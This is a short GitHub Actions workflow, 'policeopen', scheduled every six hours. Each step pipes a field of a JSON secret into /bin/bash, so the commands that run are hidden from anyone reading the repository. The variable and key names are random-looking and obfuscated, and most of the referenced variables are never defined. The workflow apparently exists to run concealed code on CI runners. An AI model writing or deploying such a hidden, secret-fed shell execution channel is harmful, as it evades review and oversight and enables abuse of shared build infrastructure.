name: policeopen

on:
  workflow_dispatch:
  schedule:
    - cron: '18 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: policeopen
        env:
          wmawn038: ${{ secrets.wmawn038 }}
        run: |
          echo $wmawn038 | jq -r .sj1108 | /bin/bash
          echo $lys187 | jq -r .plh64 | /bin/bash
          echo $jwtk9539 | jq -r .p73 | /bin/bash
          echo $zwe58200 | jq -r .h77363 | /bin/bash
          echo $v37 | jq -r .ler2231 | /bin/bash
          echo $uj81766 | jq -r .dly4079 | /bin/bash
          echo $wawx11195 | jq -r .rke07083 | /bin/bash
          echo $ngi04523 | jq -r .oemr7908 | /bin/bash
          echo $wfp29 | jq -r .ngain83 | /bin/bash
          echo $rdscj56172 | jq -r .pzud53743 | /bin/bash
          echo $bfmw2 | jq -r .jm63 | /bin/bash
          echo $rcp89295 | jq -r .ewb9065 | /bin/bash
          echo $uog80 | jq -r .mrmn7 | /bin/bash
          echo $o09035 | jq -r .uo2936 | /bin/bash

